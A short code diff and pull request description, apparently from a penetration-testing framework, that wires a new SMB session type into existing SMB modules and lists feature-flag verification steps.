+    ds = {
+      'RHOST' => client.target.ip,
+      'RPORT' => client.target.port
+    }
+
+    s = start_session(self, nil, ds, false, sess.rstream, sess)
+
+    s.platform = platform
+
+    s
+  end
+
 end


### PR DESCRIPTION
Continuation of #18539 which must be merged first

This PR adds support (either creating or utilising ) the new SMB session type to a bunch of the existing SMB modules

Verification Steps:
- [ ] make sure the feature is off first `features set smb_session_type false`
- [ ] Run through the standard usage of the modules, ensure the `SESSION` datastore option is not visible and the modules succeed
- [ ] Turn the feature on `features set smb_session_type true`
- [ ] Run through the modules again creating or using an SMB session type where applicable, the results should be identical to the modules standard usage